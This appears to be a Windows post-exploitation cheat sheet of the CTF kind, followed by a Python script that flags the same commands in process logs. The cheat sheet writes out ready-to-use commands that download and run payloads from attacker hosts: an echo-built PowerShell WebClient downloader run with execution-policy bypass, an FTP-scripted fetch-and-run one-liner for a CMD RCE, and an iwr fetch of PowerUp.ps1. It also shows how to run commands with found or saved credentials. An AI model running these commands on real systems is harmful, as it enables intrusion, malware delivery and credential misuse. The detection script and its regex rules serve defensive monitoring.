Download a file from CMD by writing a PowerShell script line by line with echo, then running it
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1
echo $file = "exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Download a file with the built-in ftp client driven by a command script (-n suppresses auto-login, so USER is sent explicitly and the following line is read as the password; -s: reads the commands from the file)
echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME
ftp -ns:$FILE_NAME
If you get a CMD RCE, use this one-liner to fetch a PS1 file over FTP and run it, so that it can download other files:
cmd.exe /c "@echo open 10.10.14.8>script.txt&@echo anonymous>>script.txt&@echo password>>script.txt&@echo get script.ps1>>script.txt&@echo bye>>script.txt&@ftp -ns:script.txt&@powershell.exe -File script.ps1"
Show hidden files by clearing the system, hidden and read-only attributes recursively
attrib -s -h -r /s /d *.*
Show files from alternate data sources
View files from the alternate source
Use found credentials to run commands as another user (runas /savecred reuses a credential stored for that account)
runas /savecred /user:$MACHINE_NAME\$USER_NAME "cmd /c COMMAND GOES HERE"
The same from PowerShell: build a PSCredential object and run the command remotely with Invoke-Command (PowerShell Remoting)
$Username = 'USER_NAME'
$Password = 'PASSWORD'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Invoke-Command -ComputerName $MACHINE_NAME -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
Download a file using PowerShell
powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"
Import a module from a different location
Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -Verbose
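As an added defensive example that is not part of this cheat sheet, the following Python script classifies process-creation command lines against the patterns the commands above leave in telemetry (WebClient downloads, -ExecutionPolicy Bypass, scripted ftp, runas /savecred, iwr -OutFile), and goes slightly beyond the page by also covering the attrib and ConvertTo-SecureString lines. The record format, host and user names, the rule set and the sample log lines are assumptions constructed for this example.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Detection rules for the command-line patterns used on this page. The tag
# names and regexes are assumptions for this example, not a complete catalogue.
RULES = [
    ("ps_webclient_download", re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I)),
    ("ps_iwr_outfile", re.compile(r"\b(iwr|Invoke-WebRequest|curl|wget)\b.*-OutFile", re.I)),
    ("ps_execution_policy_bypass", re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("ftp_scripted_transfer", re.compile(r"\bftp(\.exe)?\b.*\s-n?s:", re.I)),
    ("runas_savecred", re.compile(r"\brunas(\.exe)?\b.*/savecred", re.I)),
    ("ps_plaintext_credential", re.compile(r"ConvertTo-SecureString.*-AsPlainText", re.I)),
    ("attrib_unhide_recursive", re.compile(r"\battrib(\.exe)?\b.*-h\b.*/s\b", re.I)),
]

class Event(NamedTuple):
    ts: str
    host: str
    user: str
    cmdline: str

def parse_event(line: str) -> Optional[Event]:
    """Parse one 'ts|host|user|cmdline' record (assumed format); None if malformed."""
    parts = line.rstrip("\n").split("|", 3)  # maxsplit keeps any '|' inside the command line
    return Event(*parts) if len(parts) == 4 else None

def classify(cmdline: str) -> List[str]:
    """Return the tags of every rule the command line matches (empty if none)."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]

def scan(lines) -> List[Tuple[Event, List[str]]]:
    """Return (event, tags) for each parsable record that matches at least one rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is not None:
            tags = classify(ev.cmdline)
            if tags:
                hits.append((ev, tags))
    return hits

# Constructed process-creation records (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z|WS01|corp\\jdoe|cmd.exe /c echo $webclient = New-Object System.Net.WebClient >>wget.ps1",
    "2024-05-01T10:00:05Z|WS01|corp\\jdoe|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    "2024-05-01T10:01:12Z|WS01|corp\\jdoe|ftp -ns:script.txt",
    "2024-05-01T10:02:30Z|WS01|corp\\jdoe|runas /savecred /user:WS01\\Administrator \"cmd /c whoami\"",
    "2024-05-01T10:03:00Z|WS01|corp\\jdoe|powershell -command \"& { iwr http://192.0.2.10/PowerUp.ps1 -OutFile PowerUp.ps1 }\"",
    "2024-05-01T10:04:00Z|WS01|corp\\svc|notepad.exe C:\\temp\\notes.txt",
    "malformed record with no separators",
]

if __name__ == "__main__":
    for ev, tags in scan(SAMPLE_LOG):
        print(f"{ev.ts} {ev.host} {ev.user}: {', '.join(tags)}  <- {ev.cmdline}")
```

Each rule matches the command line alone; in practice you would also correlate on the parent process (cmd.exe spawning powershell.exe or ftp.exe) and on the user context to cut false positives.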